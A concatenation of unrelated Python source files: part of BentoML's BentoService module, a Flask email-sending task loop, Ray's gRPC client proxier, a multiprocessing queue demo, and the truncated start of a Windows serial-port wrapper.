>>> from bentoml.service.artifacts.common import PickleArtifact
>>>
>>> @ver(major=1, minor=4)
>>> @artifacts([PickleArtifact('model')])
>>> class MyMLService(BentoService):
>>> pass
>>>
>>> svc = MyMLService()
>>> svc.pack("model", trained_classifier)
>>> svc.set_version("2019-08.iteration20")
>>> svc.save()
>>> # The final produced BentoService bundle will have version:
>>> # "1.4.2019-08.iteration20"
"""
def decorator(bento_service_cls):
bento_service_cls._version_major = major
bento_service_cls._version_minor = minor
return bento_service_cls
return decorator
def validate_version_str(version_str):
"""
Validate that version str format is either a simple version string that:
* Consist of only ALPHA / DIGIT / "-" / "." / "_"
* Length between 1-128
Or a valid semantic version https://github.com/semver/semver/blob/master/semver.md
"""
regex = r"[A-Za-z0-9_.-]{1,128}\Z"
semver_regex = r"^(?P<major>0|[1-9]\d*)\.(?P<minor>0|[1-9]\d*)\.(?P<patch>0|[1-9]\d*)(?:-(?P<prerelease>(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+(?P<buildmetadata>[0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$" # noqa: E501
if (
re.match(regex, version_str) is None
and re.match(semver_regex, version_str) is None
):
raise InvalidArgument(
'Invalid BentoService version: "{}", it can only consist'
' ALPHA / DIGIT / "-" / "." / "_", and must be less than'
"128 characters".format(version_str)
)
if version_str.lower() == "latest":
raise InvalidArgument('BentoService version can not be set to "latest"')
def save(bento_service, base_path=None, version=None, labels=None):
"""
Save and register the given BentoService via BentoML's built-in model management
system. BentoML by default keeps track of all the SavedBundle's files and metadata
in local file system under the $BENTOML_HOME(~/bentoml) directory. Users can also
configure BentoML to save their BentoService to a shared Database and cloud object
storage such as AWS S3.
:param bento_service: target BentoService instance to be saved
:param base_path: optional - override repository base path
:param version: optional - save with version override
:param labels: optional - user defined labels
:return: saved_path: file path to where the BentoService is saved
"""
logger.warning(
"`from bentoml import save` is being deprecated soon, use BentoService#save "
"and BentoService#save_to_dir instead."
)
from bentoml.yatai.client import YataiClient
from bentoml.yatai.yatai_service import get_yatai_service
if base_path:
yatai_service = get_yatai_service(file_system_directory=base_path)
yatai_client = YataiClient(yatai_service)
else:
yatai_client = YataiClient()
return yatai_client.repository.upload(bento_service, version, labels)
class BentoService:
"""
BentoService is the base component for building prediction services using BentoML.
BentoService provide an abstraction for describing model artifacts and environment
dependencies required for a prediction service. And allows users to create inference
APIs that defines the inferencing logic and how the underlying model can be served.
Each BentoService can contain multiple models and serve multiple inference APIs.
Usage example:
>>> from bentoml import BentoService, env, api, artifacts
>>> from bentoml.adapters import DataframeInput
>>> from bentoml.frameworks.sklearn import SklearnModelArtifact
>>>
>>> @artifacts([SklearnModelArtifact('clf')])
>>> @env(pip_packages=["scikit-learn"])
>>> class MyMLService(BentoService):
>>>
>>> @api(input=DataframeInput(), batch=True)
>>> def predict(self, df):
>>> return self.artifacts.clf.predict(df)
>>>
>>> if __name__ == "__main__":
>>> bento_service = MyMLService()
>>> bento_service.pack('clf', trained_classifier_model)
>>> bento_service.save_to_dir('/bentoml_bundles')
"""
# List of inference APIs that this BentoService provides
_inference_apis: List[InferenceAPI] = []
# Name of this BentoService. It is default the class name of this BentoService class
_bento_service_name: str = None
# For BentoService loaded from saved bundle, this will be set to the path of bundle.
# When user install BentoService bundle as a PyPI package, this will be set to the
# installed site-package location of current python environment
_bento_service_bundle_path: str = None
# List of artifacts required by this BentoService class, declared via the `@env`
# decorator. This list is used for initializing an empty ArtifactCollection when
# the BentoService class is instantiated
_declared_artifacts: List[BentoServiceArtifact] = []
# An instance of ArtifactCollection, containing all required trained model artifacts
_artifacts: ArtifactCollection = None
# A `BentoServiceEnv` instance specifying the required dependencies and all system
# environment setups
_env = None
# When loading BentoService from saved bundle, this will be set to the version of
# the saved BentoService bundle
_bento_service_bundle_version = None
# See `ver_decorator` function above for more information
_version_major = None
_version_minor = None
# See `web_static_content` function above for more
_web_static_content = None
def __init__(self):
# When creating BentoService instance from a saved bundle, set version to the
# version specified in the saved bundle
self._bento_service_version = self.__class__._bento_service_bundle_version
self._dev_server_bundle_path: tempfile.TemporaryDirectory = None
self._dev_server_interrupt_event: multiprocessing.Event = None
self._dev_server_process: subprocess.Process = None
self._config_artifacts()
self._config_inference_apis()
self._config_environments()
def _config_environments(self):
self._env = self.__class__._env or BentoServiceEnv()
for api in self._inference_apis:
self._env.add_pip_packages(api.input_adapter.pip_dependencies)
self._env.add_pip_packages(api.output_adapter.pip_dependencies)
for artifact in self.artifacts.get_artifact_list():
artifact.set_dependencies(self.env)
def _config_inference_apis(self):
self._inference_apis = []
for _, function in inspect.getmembers(
self.__class__,
predicate=lambda x: inspect.isfunction(x) or inspect.ismethod(x),
):
if hasattr(function, "_is_api"):
api_name = getattr(function, "_api_name")
route = getattr(function, "_api_route", None)
api_doc = getattr(function, "_api_doc")
input_adapter = getattr(function, "_input_adapter")
output_adapter = getattr(function, "_output_adapter")
mb_max_latency = getattr(function, "_mb_max_latency")
mb_max_batch_size = getattr(function, "_mb_max_batch_size")
batch = getattr(function, "_batch")
# Bind api method call with self(BentoService instance)
user_func = function.__get__(self)
self._inference_apis.append(
InferenceAPI(
self,
api_name,
api_doc,
input_adapter=input_adapter,
user_func=user_func,
output_adapter=output_adapter,
mb_max_latency=mb_max_latency,
mb_max_batch_size=mb_max_batch_size,
batch=batch,
route=route,
)
)
def _config_artifacts(self):
self._artifacts = ArtifactCollection.from_declared_artifact_list(
self._declared_artifacts
)
if self._bento_service_bundle_path:
# For pip installed BentoService, artifacts directory is located at
# 'package_path/artifacts/', but for loading from bundle directory, it is
# in 'path/{service_name}/artifacts/'
if os.path.isdir(
os.path.join(self._bento_service_bundle_path, ARTIFACTS_DIR_NAME)
):
artifacts_path = os.path.join(
self._bento_service_bundle_path, ARTIFACTS_DIR_NAME
)
else:
artifacts_path = os.path.join(
self._bento_service_bundle_path, self.name, ARTIFACTS_DIR_NAME
)
self.artifacts.load_all(artifacts_path)
@property
def inference_apis(self) -> List[InferenceAPI]:
"""Return a list of user defined API functions
Returns:
list(InferenceAPI): List of Inference API objects
"""
return self._inference_apis
def get_inference_api(self, api_name):
"""Find the inference API in this BentoService with a specific name.
When the api_name is None, this returns the first Inference API found in the
`self.inference_apis` list.
:param api_name: the target Inference API's name
:return:
"""
if api_name:
try:
return next(
(api for api in self.inference_apis if api.name == api_name)
)
except StopIteration:
raise NotFound(
"Can't find API '{}' in service '{}'".format(api_name, self.name)
)
elif len(self.inference_apis) > 0:
return self.inference_apis[0]
else:
raise NotFound(f"Can't find any inference API in service '{self.name}'")
@property
def artifacts(self):
""" Returns the ArtifactCollection instance specified with this BentoService
class
Returns:
artifacts(ArtifactCollection): A dictionary of packed artifacts from the
artifact name to the BentoServiceArtifact instance
"""
return self._artifacts
@property
def env(self):
return self._env
@property
def web_static_content(self):
return self._web_static_content
def get_web_static_content_path(self):
if not self.web_static_content:
return None
if self._bento_service_bundle_path:
return os.path.join(
self._bento_service_bundle_path, self.name, 'web_static_content',
)
else:
return os.path.join(os.getcwd(), self.web_static_content)
@hybridmethod
@property
def name(self):
"""
:return: BentoService name
"""
return self.__class__.name # pylint: disable=no-value-for-parameter
@name.classmethod
@property
def name(cls): # pylint: disable=no-self-argument,invalid-overridden-method
"""
:return: BentoService name
"""
if cls._bento_service_name is not None:
if not cls._bento_service_name.isidentifier():
raise InvalidArgument(
'BentoService#_bento_service_name must be valid python identifier'
'matching regex `(letter|"_")(letter|digit|"_")*`'
)
return cls._bento_service_name
else:
# Use python class name as service name
return cls.__name__
def set_version(self, version_str=None):
"""Set the version of this BentoService instance. Once the version is set
explicitly via `set_version`, the `self.versioneer` method will no longer be
invoked when saving this BentoService.
"""
if version_str is None:
version_str = self.versioneer()
if self._version_major is not None and self._version_minor is not None:
# BentoML uses semantic versioning for BentoService distribution
# when user specified the MAJOR and MINOR version number along with
# the BentoService class definition with '@ver' decorator.
# The parameter version(or auto generated version) here will be used as
# PATCH field in the final version:
version_str = ".".join(
[str(self._version_major), str(self._version_minor), version_str]
)
validate_version_str(version_str)
if self.__class__._bento_service_bundle_version is not None:
logger.warning(
"Overriding loaded BentoService(%s) version:%s to %s",
self.__class__._bento_service_bundle_path,
self.__class__._bento_service_bundle_version,
version_str,
)
self.__class__._bento_service_bundle_version = None
if (
self._bento_service_version is not None
and self._bento_service_version != version_str
):
logger.warning(
"Resetting BentoService '%s' version from %s to %s",
self.name,
self._bento_service_version,
version_str,
)
self._bento_service_version = version_str
return self._bento_service_version
def versioneer(self):
"""
Function used to generate a new version string when saving a new BentoService
bundle. User can also override this function to get a customized version format
"""
datetime_string = datetime.now().strftime("%Y%m%d%H%M%S")
random_hash = uuid.uuid4().hex[:6].upper()
# Example output: '20191009135240_D246ED'
return datetime_string + "_" + random_hash
@property
def version(self):
"""
Return the version of this BentoService. If the version of this BentoService has
not been set explicitly via `self.set_version`, a new version will be generated
with the `self.versioneer` method. User can customize this version str either by
setting the version with `self.set_version` before a `save` call, or override
the `self.versioneer` method to customize the version str generator logic.
For BentoService loaded from a saved bundle, this will simply return the version
information found in the saved bundle.
:return: BentoService version str
"""
if self.__class__._bento_service_bundle_version is not None:
return self.__class__._bento_service_bundle_version
if self._bento_service_version is None:
self.set_version(self.versioneer())
return self._bento_service_version
@property
def tag(self):
"""
Bento tag is simply putting its name and version together, separated by a colon
`tag` is mostly used in Yatai model management related APIs and operations
"""
return f"{self.name}:{self.version}"
def save(self, yatai_url=None, version=None, labels=None):
"""
Save and register this BentoService via BentoML's built-in model management
system. BentoML by default keeps track of all the SavedBundle's files and
metadata in local file system under the $BENTOML_HOME(~/bentoml) directory.
Users can also configure BentoML to save their BentoService to a shared Database
and cloud object storage such as AWS S3.
:param yatai_url: optional - URL path to Yatai server
:param version: optional - save with version override
:param labels: optional - labels dictionary
:return: saved_path: file path to where the BentoService is saved
"""
from bentoml.yatai.client import get_yatai_client
yc = get_yatai_client(yatai_url)
return yc.repository.upload(self, version, labels)
def save_to_dir(self, path, version=None):
"""Save this BentoService along with all its artifacts, source code and
dependencies to target file path, assuming path exist and empty. If target path
is not empty, this call may override existing files in the given path.
:param path (str): Destination of where the bento service will be saved
:param version: optional - save with version override
"""
return save_to_dir(self, path, version)
@hybridmethod
def pack(self, name, *args, **kwargs):
"""
BentoService#pack method is used for packing trained model instances with a
BentoService instance and make it ready for BentoService#save.
pack(name, *args, **kwargs):
:param name: name of the declared model artifact
:param args: args passing to the target model artifact to be packed
:param kwargs: kwargs passing to the target model artifact to be packed
:return: this BentoService instance
"""
self.artifacts.get(name).pack(*args, **kwargs)
return self
@pack.classmethod
def pack(cls, *args, **kwargs): # pylint: disable=no-self-argument
"""
**Deprecated**: Legacy `BentoService#pack` class method, no longer supported
"""
raise BentoMLException(
"BentoService#pack class method is deprecated, use instance method `pack` "
"instead. e.g.: svc = MyBentoService(); svc.pack('model', model_object)"
)
def get_bento_service_metadata_pb(self):
return SavedBundleConfig(self).get_bento_service_metadata_pb()
pip_dependencies_map = None
def start_dev_server(self, port=None, enable_ngrok=False, debug=False):
if self._dev_server_process:
logger.warning(
"There is already a running dev server, "
"please call `service.stop_dev_server()` first."
)
return
try:
self._dev_server_bundle_path = tempfile.TemporaryDirectory()
self.save_to_dir(self._dev_server_bundle_path.name)
def print_log(p):
for line in p.stdout:
print(line.decode(), end='')
def run(path, interrupt_event):
my_env = os.environ.copy()
# my_env["FLASK_ENV"] = "development"
cmd = [sys.executable, "-m", "bentoml", "serve"]
if port:
cmd += ['--port', f'{port}']
if enable_ngrok:
cmd += ['--run-with-ngrok']
if debug:
cmd += ['--debug']
cmd += [path]
p = subprocess.Popen(
cmd,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
env=my_env,
)
threading.Thread(target=print_log, args=(p,), daemon=True).start()
interrupt_event.wait()
p.terminate()
self._dev_server_interrupt_event = multiprocessing.Event()
self._dev_server_process = multiprocessing.Process(
target=run,
args=(
self._dev_server_bundle_path.name,
self._dev_server_interrupt_event,
),
daemon=True,
)
self._dev_server_process.start()
logger.info(
f"======= starting dev server on port: {port if port else 5000} ======="
)
except Exception as e: # pylint: disable=broad-except
self.stop_dev_server(skip_log=True)
raise e
def stop_dev_server(self, skip_log=False):
if self._dev_server_interrupt_event:
self._dev_server_interrupt_event.set()
self._dev_server_interrupt_event = None
if self._dev_server_process:
self._dev_server_process.join()
assert not self._dev_server_process.is_alive()
self._dev_server_process = None
logger.info("Dev server has stopped.")
elif not skip_log:
logger.warning("No dev server is running.")
if self._dev_server_bundle_path:
self._dev_server_bundle_path.cleanup()
self._dev_server_bundle_path = None
def __del__(self):
if hasattr(self, "_dev_server_interrupt_event"): # __init__ may not be called
self.stop_dev_server(skip_log=True)
@inject
def infer_pip_dependencies_map(
self,
bentoml_version: str = Provide[
BentoMLContainer.bento_bundle_deployment_version
],
):
if not self.pip_dependencies_map:
self.pip_dependencies_map = {}
bento_service_module = sys.modules[self.__class__.__module__]
if hasattr(bento_service_module, "__file__"):
bento_service_py_file_path = bento_service_module.__file__
reqs, unknown_modules = seek_pip_packages(bento_service_py_file_path)
self.pip_dependencies_map.update(reqs)
for module_name in unknown_modules:
logger.warning(
"unknown package dependency for module: %s", module_name
)
# Reset bentoml to configured deploy version - this is for users using
# customized BentoML branch for development but use a different stable
# version for deployment
#
# For example, a BentoService created with local dirty branch will fail
# to deploy with docker due to the version can't be found on PyPI, but
# get_bentoml_deploy_version gives the user the latest released PyPI
# version that's closest to the `dirty` branch
self.pip_dependencies_map['bentoml'] = bentoml_version
return self.pip_dependencies_map
|
tasks.py
|
# import os
# import sys
# sys.path.insert(0, os.getcwd())
from manage import app as application
app_context = application.app_context()
app_context.push()
from app import db
from app import mail
from app.models import Task
import time
from datetime import datetime
from threading import Thread
from flask import current_app
from flask_mail import Message
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, **kw):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
stub = """
<body>
<h1>Question</h1>
<div class="question">
{question}
</div>
<h1>Answer</h1>
<details class="question">
{answer}
</details>
</body>
"""
msg.body = stub.format(subject=subject, question=kw['question'],
answer=kw['answer']).encode('utf-8')
msg.html = stub.format(subject=subject, question=kw['question'],
answer=kw['answer']).encode('utf-8')
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
def get_tasks():
return db.session.query(Task).filter(
Task.start_timestamp < datetime.now()).all()
def main():
while True:
for task in get_tasks():
to = task.post.author.email
subject = task.post.question
kw = dict(
question=task.post.question_html,
answer=task.post.answer_html
)
send_email(to, subject, **kw)
db.session.delete(task)
db.session.commit()
time.sleep(60)
if __name__ == '__main__':
main()
|
proxier.py
|
import atexit
from concurrent import futures
from dataclasses import dataclass
import grpc
import logging
from itertools import chain
import json
import socket
import sys
from threading import Lock, Thread, RLock
import time
import traceback
from typing import Any, Callable, Dict, List, Optional, Tuple
import ray
from ray.cloudpickle.compat import pickle
from ray.job_config import JobConfig
import ray.core.generated.ray_client_pb2 as ray_client_pb2
import ray.core.generated.ray_client_pb2_grpc as ray_client_pb2_grpc
from ray.util.client.common import (ClientServerHandle,
CLIENT_SERVER_MAX_THREADS, GRPC_OPTIONS)
from ray._private.parameter import RayParams
from ray._private.services import ProcessInfo, start_ray_client_server
from ray._private.utils import detect_fate_sharing_support
# Import psutil after ray so the packaged version is used.
import psutil
logger = logging.getLogger(__name__)
CHECK_PROCESS_INTERVAL_S = 30
MIN_SPECIFIC_SERVER_PORT = 23000
MAX_SPECIFIC_SERVER_PORT = 24000
CHECK_CHANNEL_TIMEOUT_S = 10
LOGSTREAM_RETRIES = 5
LOGSTREAM_RETRY_INTERVAL_SEC = 2
def _get_client_id_from_context(context: Any) -> str:
"""
Get `client_id` from gRPC metadata. If the `client_id` is not present,
this function logs an error and sets the status_code.
"""
metadata = {k: v for k, v in context.invocation_metadata()}
client_id = metadata.get("client_id") or ""
if client_id == "":
logger.error("Client connecting with no client_id")
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
return client_id
@dataclass
class SpecificServer:
port: int
process_handle_future: futures.Future
channel: "grpc._channel.Channel"
def wait_ready(self, timeout: Optional[float] = None) -> None:
"""
Wait for the server to actually start up.
"""
res = self.process_handle_future.result(timeout=timeout)
if res is None:
# This is only set to none when server creation specifically fails.
raise RuntimeError("Server startup failed.")
def poll(self) -> Optional[int]:
"""Check if the process has exited."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
return proc.process.poll()
except futures.TimeoutError:
return
def kill(self) -> None:
"""Try to send a KILL signal to the process."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
proc.process.kill()
except futures.TimeoutError:
# Server has not been started yet.
pass
def set_result(self, proc: Optional[ProcessInfo]) -> None:
"""Set the result of the internal future if it is currently unset."""
if not self.process_handle_future.done():
self.process_handle_future.set_result(proc)
def _match_running_client_server(command: List[str]) -> bool:
"""
Detects if the main process in the given command is the RayClient Server.
This works by ensuring that the the first three arguments are similar to:
<python> -m ray.util.client.server
"""
flattened = " ".join(command)
rejoined = flattened.split()
if len(rejoined) < 3:
return False
return rejoined[1:3] == ["-m", "ray.util.client.server"]
class ProxyManager():
def __init__(self,
redis_address: Optional[str],
*,
session_dir: Optional[str] = None,
redis_password: Optional[str] = None):
self.servers: Dict[str, SpecificServer] = dict()
self.server_lock = RLock()
self._redis_address = redis_address
self._redis_password = redis_password
self._free_ports: List[int] = list(
range(MIN_SPECIFIC_SERVER_PORT, MAX_SPECIFIC_SERVER_PORT))
self._check_thread = Thread(target=self._check_processes, daemon=True)
self._check_thread.start()
self.fate_share = bool(detect_fate_sharing_support())
self._node: Optional[ray.node.Node] = None
atexit.register(self._cleanup)
def _get_unused_port(self) -> int:
"""
Search for a port in _free_ports that is unused.
"""
with self.server_lock:
num_ports = len(self._free_ports)
for _ in range(num_ports):
port = self._free_ports.pop(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(("", port))
except OSError:
self._free_ports.append(port)
continue
finally:
s.close()
return port
raise RuntimeError("Unable to succeed in selecting a random port.")
@property
def redis_address(self) -> str:
"""
Returns the provided Ray Redis address, or creates a new cluster.
"""
if self._redis_address:
return self._redis_address
# Start a new, locally scoped cluster.
connection_tuple = ray.init()
self._redis_address = connection_tuple["redis_address"]
self._session_dir = connection_tuple["session_dir"]
return self._redis_address
@property
def node(self) -> ray.node.Node:
"""Gets a 'ray.Node' object for this node (the head node).
If it does not already exist, one is created using the redis_address.
"""
if self._node:
return self._node
ray_params = RayParams(redis_address=self.redis_address)
if self._redis_password:
ray_params.redis_password = self._redis_password
self._node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
return self._node
def create_specific_server(self, client_id: str) -> SpecificServer:
"""
Create, but not start a SpecificServer for a given client. This
method must be called once per client.
"""
with self.server_lock:
assert self.servers.get(client_id) is None, (
f"Server already created for Client: {client_id}")
port = self._get_unused_port()
server = SpecificServer(
port=port,
process_handle_future=futures.Future(),
channel=grpc.insecure_channel(
f"localhost:{port}", options=GRPC_OPTIONS))
self.servers[client_id] = server
return server
def start_specific_server(self, client_id: str,
job_config: JobConfig) -> bool:
"""
Start up a RayClient Server for an incoming client to
communicate with. Returns whether creation was successful.
"""
specific_server = self._get_server_for_client(client_id)
assert specific_server, f"Server has not been created for: {client_id}"
serialized_runtime_env = job_config.get_serialized_runtime_env()
output, error = self.node.get_log_file_handles(
f"ray_client_server_{specific_server.port}", unique=True)
proc = start_ray_client_server(
self.redis_address,
specific_server.port,
stdout_file=output,
stderr_file=error,
fate_share=self.fate_share,
server_type="specific-server",
serialized_runtime_env=serialized_runtime_env,
session_dir=self.node.get_session_dir_path(),
redis_password=self._redis_password)
# Wait for the process being run transitions from the shim process
# to the actual RayClient Server.
pid = proc.process.pid
if sys.platform != "win32":
psutil_proc = psutil.Process(pid)
else:
psutil_proc = None
# Don't use `psutil` on Win32
while psutil_proc is not None:
if proc.process.poll() is not None:
logger.error(
f"SpecificServer startup failed for client: {client_id}")
break
cmd = psutil_proc.cmdline()
if _match_running_client_server(cmd):
break
logger.debug(
"Waiting for Process to reach the actual client server.")
time.sleep(0.5)
specific_server.set_result(proc)
logger.info(f"SpecificServer started on port: {specific_server.port} "
f"with PID: {pid} for client: {client_id}")
return proc.process.poll() is None
def _get_server_for_client(self,
client_id: str) -> Optional[SpecificServer]:
with self.server_lock:
client = self.servers.get(client_id)
if client is None:
logger.error(f"Unable to find channel for client: {client_id}")
return client
def get_channel(
self,
client_id: str,
) -> Optional["grpc._channel.Channel"]:
"""
Find the gRPC Channel for the given client_id. This will block until
the server process has started.
"""
server = self._get_server_for_client(client_id)
if server is None:
return None
# Wait for the SpecificServer to become ready.
server.wait_ready()
try:
grpc.channel_ready_future(
server.channel).result(timeout=CHECK_CHANNEL_TIMEOUT_S)
return server.channel
except grpc.FutureTimeoutError:
logger.exception(f"Timeout waiting for channel for {client_id}")
return None
def _check_processes(self):
"""
Keeps the internal servers dictionary up-to-date with running servers.
"""
while True:
with self.server_lock:
for client_id, specific_server in list(self.servers.items()):
if specific_server.poll() is not None:
del self.servers[client_id]
# Port is available to use again.
self._free_ports.append(specific_server.port)
time.sleep(CHECK_PROCESS_INTERVAL_S)
def _cleanup(self) -> None:
"""
Forcibly kill all spawned RayClient Servers. This ensures cleanup
for platforms where fate sharing is not supported.
"""
for server in self.servers.values():
server.kill()
class RayletServicerProxy(ray_client_pb2_grpc.RayletDriverServicer):
def __init__(self, ray_connect_handler: Callable,
proxy_manager: ProxyManager):
self.proxy_manager = proxy_manager
self.ray_connect_handler = ray_connect_handler
def _call_inner_function(
self, request, context,
method: str) -> Optional[ray_client_pb2_grpc.RayletDriverStub]:
client_id = _get_client_id_from_context(context)
chan = self.proxy_manager.get_channel(client_id)
if not chan:
logger.error(f"Channel for Client: {client_id} not found!")
context.set_code(grpc.StatusCode.NOT_FOUND)
return None
stub = ray_client_pb2_grpc.RayletDriverStub(chan)
try:
return getattr(stub, method)(
request, metadata=[("client_id", client_id)])
except Exception:
logger.exception(f"Proxying call to {method} failed!")
def Init(self, request, context=None) -> ray_client_pb2.InitResponse:
return self._call_inner_function(request, context, "Init")
def PrepRuntimeEnv(self, request,
context=None) -> ray_client_pb2.PrepRuntimeEnvResponse:
return self._call_inner_function(request, context, "PrepRuntimeEnv")
def KVPut(self, request, context=None) -> ray_client_pb2.KVPutResponse:
return self._call_inner_function(request, context, "KVPut")
def KVGet(self, request, context=None) -> ray_client_pb2.KVGetResponse:
return self._call_inner_function(request, context, "KVGet")
def KVDel(self, request, context=None) -> ray_client_pb2.KVDelResponse:
return self._call_inner_function(request, context, "KVGet")
def KVList(self, request, context=None) -> ray_client_pb2.KVListResponse:
return self._call_inner_function(request, context, "KVList")
def KVExists(self, request,
context=None) -> ray_client_pb2.KVExistsResponse:
return self._call_inner_function(request, context, "KVExists")
def ListNamedActors(self, request, context=None
) -> ray_client_pb2.ClientListNamedActorsResponse:
return self._call_inner_function(request, context, "ListNamedActors")
def ClusterInfo(self, request,
context=None) -> ray_client_pb2.ClusterInfoResponse:
# NOTE: We need to respond to the PING request here to allow the client
# to continue with connecting.
if request.type == ray_client_pb2.ClusterInfoType.PING:
resp = ray_client_pb2.ClusterInfoResponse(json=json.dumps({}))
return resp
return self._call_inner_function(request, context, "ClusterInfo")
def Terminate(self, req, context=None):
return self._call_inner_function(req, context, "Terminate")
def GetObject(self, request, context=None):
return self._call_inner_function(request, context, "GetObject")
def PutObject(self, request: ray_client_pb2.PutRequest,
context=None) -> ray_client_pb2.PutResponse:
return self._call_inner_function(request, context, "PutObject")
def WaitObject(self, request, context=None) -> ray_client_pb2.WaitResponse:
return self._call_inner_function(request, context, "WaitObject")
def Schedule(self, task, context=None) -> ray_client_pb2.ClientTaskTicket:
return self._call_inner_function(task, context, "Schedule")
def ray_client_server_env_prep(job_config: JobConfig) -> JobConfig:
return job_config
def prepare_runtime_init_req(init_request: ray_client_pb2.DataRequest
) -> Tuple[ray_client_pb2.DataRequest, JobConfig]:
"""
Extract JobConfig and possibly mutate InitRequest before it is passed to
the specific RayClient Server.
"""
init_type = init_request.WhichOneof("type")
assert init_type == "init", ("Received initial message of type "
f"{init_type}, not 'init'.")
req = init_request.init
job_config = JobConfig()
if req.job_config:
job_config = pickle.loads(req.job_config)
new_job_config = ray_client_server_env_prep(job_config)
modified_init_req = ray_client_pb2.InitRequest(
job_config=pickle.dumps(new_job_config),
ray_init_kwargs=init_request.init.ray_init_kwargs)
init_request.init.CopyFrom(modified_init_req)
return (init_request, new_job_config)
class DataServicerProxy(ray_client_pb2_grpc.RayletDataStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
self.num_clients = 0
self.clients_lock = Lock()
self.proxy_manager = proxy_manager
def modify_connection_info_resp(self,
init_resp: ray_client_pb2.DataResponse
) -> ray_client_pb2.DataResponse:
"""
Modify the `num_clients` returned the ConnectionInfoResponse because
individual SpecificServers only have **one** client.
"""
init_type = init_resp.WhichOneof("type")
if init_type != "connection_info":
return init_resp
modified_resp = ray_client_pb2.DataResponse()
modified_resp.CopyFrom(init_resp)
with self.clients_lock:
modified_resp.connection_info.num_clients = self.num_clients
return modified_resp
def Datapath(self, request_iterator, context):
client_id = _get_client_id_from_context(context)
if client_id == "":
return
# Create Placeholder *before* reading the first request.
server = self.proxy_manager.create_specific_server(client_id)
try:
with self.clients_lock:
self.num_clients += 1
logger.info(f"New data connection from client {client_id}: ")
init_req = next(request_iterator)
try:
modified_init_req, job_config = prepare_runtime_init_req(
init_req)
if not self.proxy_manager.start_specific_server(
client_id, job_config):
logger.error(
f"Server startup failed for client: {client_id}, "
f"using JobConfig: {job_config}!")
raise RuntimeError(
"Starting up Server Failed! Check "
"`ray_client_server_[port].err` on the cluster.")
channel = self.proxy_manager.get_channel(client_id)
if channel is None:
logger.error(f"Channel not found for {client_id}")
raise RuntimeError(
"Proxy failed to Connect to backend! Check "
"`ray_client_server.err` on the cluster.")
stub = ray_client_pb2_grpc.RayletDataStreamerStub(channel)
except Exception:
init_resp = ray_client_pb2.DataResponse(
init=ray_client_pb2.InitResponse(
ok=False, msg=traceback.format_exc()))
init_resp.req_id = init_req.req_id
yield init_resp
return None
new_iter = chain([modified_init_req], request_iterator)
resp_stream = stub.Datapath(
new_iter, metadata=[("client_id", client_id)])
for resp in resp_stream:
yield self.modify_connection_info_resp(resp)
except Exception:
logger.exception("Proxying Datapath failed!")
finally:
server.set_result(None)
with self.clients_lock:
logger.debug(f"Client detached: {client_id}")
self.num_clients -= 1
class LogstreamServicerProxy(ray_client_pb2_grpc.RayletLogStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
super().__init__()
self.proxy_manager = proxy_manager
def Logstream(self, request_iterator, context):
client_id = _get_client_id_from_context(context)
if client_id == "":
return
logger.debug(f"New logstream connection from client {client_id}: ")
channel = None
# We need to retry a few times because the LogClient *may* connect
# Before the DataClient has finished connecting.
for i in range(LOGSTREAM_RETRIES):
channel = self.proxy_manager.get_channel(client_id)
if channel is not None:
break
logger.warning(
f"Retrying Logstream connection. {i+1} attempts failed.")
time.sleep(LOGSTREAM_RETRY_INTERVAL_SEC)
if channel is None:
context.set_code(grpc.StatusCode.UNAVAILABLE)
return None
stub = ray_client_pb2_grpc.RayletLogStreamerStub(channel)
resp_stream = stub.Logstream(
request_iterator, metadata=[("client_id", client_id)])
try:
for resp in resp_stream:
yield resp
except Exception:
logger.exception("Proxying Logstream failed!")
def serve_proxier(connection_str: str,
redis_address: str,
*,
redis_password: Optional[str] = None,
session_dir: Optional[str] = None):
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=CLIENT_SERVER_MAX_THREADS),
options=GRPC_OPTIONS)
proxy_manager = ProxyManager(
redis_address, session_dir=session_dir, redis_password=redis_password)
task_servicer = RayletServicerProxy(None, proxy_manager)
data_servicer = DataServicerProxy(proxy_manager)
logs_servicer = LogstreamServicerProxy(proxy_manager)
ray_client_pb2_grpc.add_RayletDriverServicer_to_server(
task_servicer, server)
ray_client_pb2_grpc.add_RayletDataStreamerServicer_to_server(
data_servicer, server)
ray_client_pb2_grpc.add_RayletLogStreamerServicer_to_server(
logs_servicer, server)
server.add_insecure_port(connection_str)
server.start()
return ClientServerHandle(
task_servicer=task_servicer,
data_servicer=data_servicer,
logs_servicer=logs_servicer,
grpc_server=server,
)
|
lala.py
|
#!/usr/bin/python
from multiprocessing import Process, Queue
import time, random
def do_something(n_order, x, queue):
time.sleep(5)
queue.put((n_order, x))
def main():
data = [1,2,3,4,5]
queue = Queue()
processes = [Process(target=do_something, args=(n,x,queue)) for n,x in enumerate(data)]
for p in processes:
p.start()
for p in processes:
p.join()
unsorted_result = [queue.get() for _ in processes]
result = [i[1] for i in sorted(unsorted_result)]
print(result)
if __name__ == '__main__':
main()
|
PythonMemSer.py
|
import mmap
import contextlib
import time
import json
import win32api
import win32con
import serial
import threading
import xmltodict
import socket
import sys
import os
class pySerial:
hander = serial.Serial()
IsSerialOpen = False
def begin(self,portx,bps):
print("open:")
ret = False
try:
self.hander = serial.Serial(portx, bps, timeout=None)
if(self.hander.is_open):
ret = True
except Exception as e:
print("[open]---异常---:", e)
win32api.MessageBox(0, "[open]---异常---:%s" % str(e), "error",win32con.MB_OK)
self.IsSerialOpen = ret
return ret
def end(self):
print("close:")
try:
self.hander.close()
self.IsSerialOpen = False
except Exception as e:
print("[close]---异常---:", e)
